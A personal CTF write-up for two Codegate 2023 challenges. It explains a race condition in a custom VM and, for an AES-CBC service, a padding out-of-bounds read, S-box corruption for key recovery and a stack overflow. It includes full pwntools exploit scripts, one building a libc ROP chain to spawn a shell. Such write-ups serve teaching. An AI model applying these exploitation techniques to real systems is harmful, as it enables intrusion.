Taking a break from my academic research, I played Codegate CTF 2023 this weekend with r3kapig. I solved two challenges: pcpu and sea, and both of them are quite interesting so here is the write-up for them. Thanks to the successful resolution of challenge sea in the last 20 minutes, our team manages to qualify for the finals. :)

pcpu

0x00 Overview

The program implements an virtual machine for a very simple customized register-based instruction set. The virtual register value can either be an integer or a reference to a list of integers, and the instructions involve operations setting and getting the value of the register or the element of the list. The VM is implemented as a pipeline: in each execution cycle, multiple threads are created to perform different tasks. Due to such multi-threading, race condition can occur that allows us to tamper some important data, which allows us to leak the flag.

0x01 Reverse Engineering

Instruction Loading. The function 0x2430 reads each instruction as an 32-bit integer and store them into an array. It executes precheck.py to check the validity of our instructions. This script simply executes these instructions and bails out if any error occurs, and in this case the program also exits. We can read this script to get some understanding of the semantics of the instructions. We can learn from this script that the register can not only be an integer but also be a reference to a list of integers. For example, inst == 2 creates such list and assign its reference to the destination register.

Execution Pipeline. The function 0x26F0 executes one cycle of the pipeline, which is achieved using 5 threads. Among them, thread functions 0x1640, 0x1550 and 0x12D0 simply moves the instruction from one queue to another while removing some unused bytes in some instructions, which are uninteresting. The thread function 0x16F0 executes the instruction obtained from the queue, but for operation that modifies the register value (e.g., move X1 to X0), the actual task to do is stored into another queue. Such queue is popped in the last thread function 0x1E60, which actually execute any register write scheduled in 0x16F0.

Register Storing List. One unique feature of this virtual instruction set is that the value of a register can actually be a reference to a list. The function 0x2270 is used to allocate a list, which allocate a structure from 0x6230. 0x6230 stores an array of 4 structures, each of which has the following field layout shown below. Such structure represents a list that could be referenced by a register. The function 0x2270 finds an element in this global array with field is_free == 1, which means the list is currently not referenced by any register. For such element, its field is_free is set to zero and its pointer is assigned to the corresponding register. In addition, before returning, 0x2270 also fetches a string pointer from 0x6100 (which is a pointer to an array of string pointers) indexed by field rand_digit, and copy this string into the field list (which overlap with rand_digit because they are not used at the same time). We should note that index 10 of 0x6100 is the flag. However, rand_digit can only be within the range 0-9, which cannot allow us to access the flag string in normal situation. In addition, when a register pointing to a list is re-written by another value, the structure representing the list will be freed again by setting is_free to 1 and resetting rand_digit to a value within range 0-9.

struct reg_list {
  uint64_t is_free;
  union {
    uint64_t rand_digit; // used when is_free == 1
    uint8_t list[0x10000]; // used when is_free == 0
  }
};

0x02 Vulnerabilty

Actually, there are many problems in the program. For example, the VM of precheck.py is inconsistent with VM of the binary program, which could cause type confusion. However, such type confusion does not seem to be exploitable. The actual problem that we use to solve the challenge is the race condition.

As we have mentioned earlier, the register rewrite is performed in a different thread (0x1E60, including freeing the reg_list structure) from another operation like writing element in a list referenced by a register (thread 0x16F0). We have also found that there is a sleep function called in some element operations. For example, writing element of a list referenced by a register:

/* code snippet in function 0x16F0 */
// obtain the register value
v17 = (reg_list *)*registers;
// sleep that is long enough for other threads to terminate
sleep(1u);
// write element at index specified by the third byte to immediate number specified by the forth byte
v17->list[(unsigned __int8)ptr->third_byte] = ptr->high_byte;

Consider we have two consecutive instructions: X0 = reg and X0[idx] = val. We should note that writing X0 (and also freeing list referenced by X0) and writing X0[idx] are both executed in the same cycle, by thread function 0x1E60 and thread function 0x16F0 respectively. Therefore, if we can fetch *register (X0) to v17 before the list referenced by X0 is freed by 0x1E60, after sleep(1) the v17 will point to a reg_list structure with is_free == 1; thus, we can write field list of a freed reg_list structure, which is now interpreted as rand_digit! Therefore, by setting the first byte to 10, we can actually load the flag content into the list when this corrupted reg_list is allocated again. The full exploit is shown below:

from pwn import *

context(log_level='info')

sh = remote("43.202.54.209", 1234)
# sh = process("./app")
# gdb.attach(sh, "c")
# sleep(2)

def send_insts(insts):
    sh.sendlineafter(b"Inst Size >", str(len(insts)).encode())
    for inst in insts:
        sh.sendline(str(u32(inst)).encode())
    for inst in insts:
        sh.recvuntil(b" > ")

alloc_list = lambda reg : p8(2) + p8(reg) + p16(0xffff)
read_reg_idx = lambda dst, src, idx : p8(4) + p8(dst) + p8(src) + p8(idx)
write_reg0_idx = lambda idx, data : p8(3) + p8(0) + p8(idx) + p8(data)
copy_reg = lambda dst, src : p8(1) + p8(dst) + p8(0) + p8(src)
dump_regs = lambda : p32(7)

prog = [alloc_list(0), alloc_list(1), # allocate 2 buffers
    copy_reg(0, 1), # transfer x1 to x0, x0 will be released
    write_reg0_idx(0, 10),
    # if x0 is first fetched, and sleep, and then released, released buffer is rewritten
    alloc_list(3), # now new buffer allocation gives OOB access
    dump_regs(), # ensure alloc is commited before any idx R/W
]

for i in range(0, 78):
    prog.append(read_reg_idx(2, 3, i))
    prog.append(dump_regs())

send_insts(prog)

flag = []
sh.recvuntil(b"X2 : 0x")
for i in range(0, 78):
    sh.recvuntil(b"X2 : 0x")
    flag.append(int(sh.recvuntil(b"\n"), 16))
    if flag[0] != ord('c'):
        exit(1)
    print(len(flag), b"".join(map(lambda x: bytes([x]), flag)))

sh.interactive()

# codegate2023{a77f1e5998a7d38c0e1f77274a344f142a7ff9d167e1419d41d6489fb138bb45}
# codegate2023{a77f1e5998a7d38c0e1f77274a344f142a7ff9d167e1419d41d6489fb138b044}

Due to race condition, we need to run it for several times in order to be able to achieve the scenario we want. In addition, due to the same race condition problem, we sometimes get the wrong flag because for some bytes the X2 is printed before it is loaded with the flag content, but this can be easily fixed manually by comparing flags from different runs.

sea

0x00 Overview

The program implements a simple AES-CBC encryption and decryption service, with key and iv being randomly generated and unknown to us. However, after each decryption the key and iv are re-generated. There are three vulnerabilities in the program: we firstly leak the pointers and canary via an out-of-bounds read in decryption; we then use a data segment overflow in the hexadecimal parser to rewrite the constants used by AES, so that key and iv can be leaked; finally, a stack overflow filled with encrypted data is exploited to get the code execution.

0x01 OOB Read to Leak Stack Data

In decryption, the function 0x15A1 is called to unpad the decrypted data. However, the sign of the padding byte is used incorrectly, which causes the problem when padding byte is larger than 0x7f (e.i., being negative when used as signed char). The problem is shown in the code snippet below.

if ( (char)last_byte <= 16 && len ) // signed comparison, so negative byte can pass the check
{
  while ( last_byte > i ) // unsigned comparison
  {
    if ( src[(unsigned int)last_idx - i] != last_byte ) // unsigned subtraction
      return -1;
    ++i;
  }
  memset(dst, 0, len);
  v12 = len - (char)last_byte; // signed subtraction, so a negative byte can increase the length!
  result = 0;
  *new_len = v12;
  qmemcpy(dst, src, v12);
}

For example, if the decrypted data is 'A' * 0x10 + '\x80' * 0x80, the last_byte will be 0x80(-128). Due to its incorrect sign handling, these 128 padding bytes can be successfully unpaded, and finally the length is increased by 128, which causes the out-of-bounds read of the stack buffer. This could leak program base, libc base and canary.

To have decrypted data 'A' * 0x10 + '\x80' * 0x80, we first use the encryption oracle to encrypt 'A' * 0x10 + '\x80' * 0x80, which will be padded and the actual data encrypted will be 'A' * 0x10 + '\x80' * 0x80 + '\x10' * 0x10. Due to the property of AES-CBC, we can simply remove the last block (0x10 bytes) of the encrypted data and send such truncated encrypted data to the decryption oracle, so that the decrypted data can be 'A' * 0x10 + '\x80' * 0x80.

0x02 Leaking Key and Initialization Vector

In hexadecimal parser function 0x1470, 0x800 bytes are read into 0x4020 at .data segment. However, the buffer has only 288 bytes, and the following bytes are round constants, S-box, and inverse S-box used by AES algorithm. According to this paper, after setting the S-box to zeros, the ciphertext generated by encrypting any data can be used to recover the key easily.

Recovering Last Expanded Key Recovering Original Key

In our scenario, since we can also write round constants, \(r_i\) in the paper can also be re-written to zeros. Therefore, we can simply recover the key by kw[0:8] + p32(u32(kw[8:12]) ^ u32(kw[0:4])) + p32(u32(kw[12:16]) ^ u32(kw[4:8])), where kw is the last expanded key, which is any ciphertext block generated by such corrupted AES.

After recovering the key, we use the overflow again to recover the constants of AES, and iv can be recovered by decrypting a block of ciphertext (obtained by encrypting a plaintext block using the encryption oracle) using ECB with the recovered key and calculating xor of decrypted block and the plaintext.

0x03 Code Execution

Finally, we can use the stack overflow in encryption to get the code execution. Since our data is encrypted, we need to firstly decrypt our payload with leaked key and iv locally. However, since the ROP chain is quite small, we firstly pivot the stack onto .data segment and then execute the "/bin/sh". This work is done by @n132.

Here is the final exploit:

from pwn import *
from Crypto.Cipher import AES
from binascii import *
import sys
context.log_level='debug'
context.arch='amd64'
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
if len(sys.argv) == 1:
    p = process("./sea",env={'LD_PRELOAD':"./libc-2.31.so"})
else:
    p = remote("54.180.128.138", 45510)

ru      = lambda a:     p.readuntil(a)
r       = lambda n:     p.read(n)
sla     = lambda a,b:   p.sendlineafter(a,b)
sa      = lambda a,b:   p.sendafter(a,b)
sl      = lambda a:     p.sendline(a)
s       = lambda a:     p.send(a)
def cmd(c):
    sla(b"> ",str(c).encode())
def enc(c):
    cmd(1)
    sla(b": ",c.hex())
    ru(b": ")
    return binascii.unhexlify(p.recvuntil(b"\n")[:-1])
def dec(c):
    cmd(2)
    sla(b": ",c.hex())
    ru(b"plaintext: ")
    return binascii.unhexlify(p.recvuntil(b"\n")[:-1])
def data_overflow(data):
    cmd(2)
    p.sendlineafter(b"ciphertext (as a hexstring) : ", binascii.hexlify(data))

leak = dec(enc(b"A" * 0x10 + b'\x80' * 0x80)[:-0x10])
base = u64(leak[18*8:19*8])-(0x7ffff7e12a61-0x00007ffff7d86000)-(0x7ffff7f36cc2-0x00007ffff7dd6000)
canary = u64(leak[32*8:33*8])
pie = u64(leak[31*8:32*8])-(0x555555558820-0x0000555555554000)
info(hex(pie))
info(hex(base))

info(hex(canary))
libc=ELF("./libc-2.31.so")
libc.address = base
rop=ROP(libc)
rdi = rop.find_gadget(['pop rdi','ret'])[0]
rsi = rop.find_gadget(['pop rsi','ret'])[0]
rdx = rop.find_gadget(['pop rdx','ret'])[0]
rax = rop.find_gadget(['pop rax','ret'])[0]
ret = rop.find_gadget(['ret'])[0]
leave = 0x00000000000578c8+base

syscall = rop.find_gadget(['syscall','ret'])[0]
binsh = libc.search(b'/bin/sh').__next__()

cmd(2)
sla(b": ", (b'A' * 288 + b'\x00' * (32 + 256 + 256 + 1)).hex())

kw = enc(b"A")
key = kw[0:8] + p32(u32(kw[8:12]) ^ u32(kw[0:4])) + p32(u32(kw[12:16]) ^ u32(kw[4:8]))

data_overflow( b"".ljust(288,b'A')+ b'\x8d\x01\x02\x04\x08\x10 @\x80\x1b6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00R\tj\xd506\xa58\xbf@\xa3\x9e\x81\xf3\xd7\xfb|\xe39\x82\x9b/\xff\x874\x8eCD\xc4\xde\xe9\xcbT{\x942\xa6\xc2#=\xeeL\x95\x0bB\xfa\xc3N\x08.\xa1f(\xd9$\xb2v[\xa2Im\x8b\xd1%r\xf8\xf6d\x86h\x98\x16\xd4\xa4\\\xcc]e\xb6\x92lpHP\xfd\xed\xb9\xda^\x15FW\xa7\x8d\x9d\x84\x90\xd8\xab\x00\x8c\xbc\xd3\n\xf7\xe4X\x05\xb8\xb3E\x06\xd0,\x1e\x8f\xca?\x0f\x02\xc1\xaf\xbd\x03\x01\x13\x8ak:\x91\x11AOg\xdc\xea\x97\xf2\xcf\xce\xf0\xb4\xe6s\x96\xact"\xe7\xad5\x85\xe2\xf97\xe8\x1cu\xdfnG\xf1\x1aq\x1d)\xc5\x89o\xb7b\x0e\xaa\x18\xbe\x1b\xfcV>K\xc6\xd2y \x9a\xdb\xc0\xfex\xcdZ\xf4\x1f\xdd\xa83\x88\x07\xc71\xb1\x12\x10Y\'\x80\xec_`Q\x7f\xa9\x19\xb5J\r-\xe5z\x9f\x93\xc9\x9c\xef\xa0\xe0;M\xae*\xf5\xb0\xc8\xeb\xbb<\x83S\x99a\x17+\x04~\xbaw\xd6&\xe1i\x14cU!\x0c}c|w{\xf2ko\xc50\x01g+\xfe\xd7\xabv\xca\x82\xc9}\xfaYG\xf0\xad\xd4\xa2\xaf\x9c\xa4r\xc0\xb7\xfd\x93&6?\xf7\xcc4\xa5\xe5\xf1q\xd81\x15\x04\xc7#\xc3\x18\x96\x05\x9a\x07\x12\x80\xe2\xeb\'\xb2u\t\x83,\x1a\x1bnZ\xa0R;\xd6\xb3)\xe3/\x84S\xd1\x00\xed \xfc\xb1[j\xcb\xbe9JLX\xcf\xd0\xef\xaa\xfbCM3\x85E\xf9\x02\x7fP<\x9f\xa8Q\xa3@\x8f\x92\x9d8\xf5\xbc\xb6\xda!\x10\xff\xf3\xd2\xcd\x0c\x13\xec_\x97D\x17\xc4\xa7~=d]\x19s`\x81O\xdc"*\x90\x88F\xee\xb8\x14\xde^\x0b\xdb\xe02:\nI\x06$\\\xc2\xd3\xacb\x91\x95\xe4y\xe7\xc87m\x8d\xd5N\xa9lV\xf4\xeaez\xae\x08\xbax%.\x1c\xa6\xb4\xc6\xe8\xddt\x1fK\xbd\x8b\x8ap>\xb5fH\x03\xf6\x0ea5W\xb9\x86\xc1\x1d\x9e\xe1\xf8\x98\x11i\xd9\x8e\x94\x9b\x1e\x87\xe9\xceU(\xdf\x8c\xa1\x89\r\xbf\xe6BhA\x99-\x0f\xb0T\xbb\x16\x01')

c = enc(b"A")
iv = bytes([a^b for a,b in zip(AES.new(key, AES.MODE_ECB).decrypt(c), b"A".ljust(16, b'\x0f'))])
print(binascii.hexlify(key), binascii.hexlify(iv))

aes = AES.new(key, AES.MODE_CBC, iv)
info(hex(leave))
rrr = flat([
    0x555555558020-0x0000555555554000+pie-8,0,leave,0
])
ropchain = flat([
    rdi,binsh,rsi,0,rdx,0,libc.sym['execve']
])
enc(aes.decrypt(AES.new(key, AES.MODE_CBC, iv).encrypt(ropchain.ljust(0xf0,b'\0')) + p64(canary) + cyclic(0x8)+rrr))

p.interactive()

PS: I broke my WSL in the last hour of the CTF due to replacing system ld with the ld used by this challenge, so I asked my teammate n132 to finish the last step of the exploitation. Lesson learned: never do this again. :)